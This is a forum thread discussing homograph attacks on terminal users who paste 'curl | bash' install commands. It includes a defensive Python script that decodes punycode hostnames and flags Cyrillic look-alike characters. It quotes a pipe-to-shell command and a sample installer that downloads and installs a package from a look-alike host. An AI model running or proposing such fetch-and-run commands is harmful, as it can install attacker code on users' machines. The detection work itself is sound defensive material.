zlacker

[return to "The browser catches homograph attacks, the terminal doesn't"]
1. accoun+2Z3 2026-02-04 13:54:38
>>MrBudd+(OP)
> curl -sSL https://install.example-cli.dev | bash # safe

This is not and has never been safe.

2. digita+VZ3 2026-02-04 14:00:16
>>accoun+2Z3
It's about as safe as trusting all the add-ons in your IDE, and all the packages your node app pulls from random package repos.

It's just the plausible blame that shifts.

If you read the script before you pipe it into your shell, it's safe.

And if that's not safe, then it's just as dangerous to trust that an unopened bottle of ketchup is safe.

Nothing is safe. Everything is a judgement. Being culpable is a professional service. Lucky people out-earn unlucky people. The world is a scary place.

3. rmunn+Kha 2026-02-06 07:18:28
>>digita+VZ3
If you read the script before piping it into your shell, you're doing better than (I'm guessing) 90% of people, but it's still possible that the attacker who got you to copy https://xn--nstall-ovf.xn--example-cl-62i.dev into your terminal has also made similarly-hard-to-spot changes to the install script. E.g. if it downloads a .deb package from https://xn--nstall-ovf.xn--example-cl-62i.dev (same Cyrillic і character in there that looks like a Latin i but isn't), you might not spot that by reading the script.

But IMHO, your "unopened bottle of ketchup" analogy doesn't work. These days, the likelihood of someone trying to trick you into running arbitrary code disguised as an install script is so much higher than the chance that someone working at the ketchup bottling plant is deliberately contaminating bottles before they go out.

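A defender-side check for the substitution rmunn describes, added here as an example and not code from the thread: it pulls every URL out of a downloaded install script, decodes `xn--` labels back to Unicode, and names each non-ASCII character so a Cyrillic і is reported as what it is rather than passing as a Latin i. The sample script is constructed; the only real value in it is the punycode hostname quoted in the post above.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Constructed sample: an install script as it might look after you download
# it to read it, fetching a package from the punycode host quoted in the thread.
# The script body is hypothetical; only the xn-- hostname comes from the post.
SAMPLE_SCRIPT = """#!/bin/sh
set -e
BASE="https://xn--nstall-ovf.xn--example-cl-62i.dev"
curl -fsSL "$BASE/releases/example-cli_1.0_amd64.deb" -o /tmp/example-cli.deb
sudo dpkg -i /tmp/example-cli.deb
echo "See https://docs.example-cli.dev for usage"
"""

# Good enough for shell scripts: a URL runs until whitespace or a shell quote.
URL_RE = re.compile(r"https?://[^\s\"'<>|`]+")


def decode_label(label: str) -> str:
    """Turn an A-label (xn--...) back into its Unicode form; pass others through."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def decode_host(host: str) -> str:
    return ".".join(decode_label(part) for part in host.split("."))


def describe_char(ch: str) -> str:
    """e.g. 'U+0456 CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I'."""
    return f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNNAMED')}"


def scripts_of(label: str) -> set:
    """Script names (first word of the Unicode character name) of a label's letters."""
    scripts = set()
    for ch in label:
        if ch.isdigit() or ch == "-":
            continue  # digits and hyphens belong to no script
        if ch.isascii() and ch.isalpha():
            scripts.add("LATIN")
        else:
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def audit_host(host: str) -> list:
    """Return one (label, reason, [char descriptions]) tuple per suspicious label."""
    findings = []
    for label in decode_host(host).split("."):
        non_ascii = [ch for ch in label if not ch.isascii()]
        if not non_ascii:
            continue
        # A Latin label with one Cyrillic letter is the classic confusable;
        # a label entirely in another script is still worth a look in an installer.
        reason = "mixed scripts" if len(scripts_of(label)) > 1 else "non-Latin script"
        findings.append((label, reason, [describe_char(ch) for ch in non_ascii]))
    return findings


def audit_script(text: str) -> dict:
    """Map every host in the script that has suspicious labels to its decoded form and findings."""
    report = {}
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname
        if host is None or host in report:
            continue
        findings = audit_host(host)
        if findings:
            report[host] = {"decoded": decode_host(host), "labels": findings}
    return report


if __name__ == "__main__":
    for host, info in audit_script(SAMPLE_SCRIPT).items():
        print(f"{host} -> {info['decoded']}")
        for label, reason, chars in info["labels"]:
            print(f"  label {label!r}: {reason}: {', '.join(chars)}")
```

Run against the sample it reports the one host, decoded as `іnstall.example-clі.dev`, with both labels flagged as mixed Latin and Cyrillic; the OP's ASCII `install.example-cli.dev` produces no findings. The point is that an `xn--` label or a non-ASCII hostname has no business in a shell installer for a tool with an ASCII name, and the terminal will not tell you that on its own.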
4. rmunn+Qha 2026-02-06 07:19:19
>>rmunn+Kha
Hah. Hacker News is immune to homograph attacks. Good to know.
5. maxbon+hra 2026-02-06 09:06:48
>>rmunn+Qha
> 2017-04-14: Blake Rand

> Links in comments were vulnerable to an IDN homograph attack.

https://news.ycombinator.com/security.html
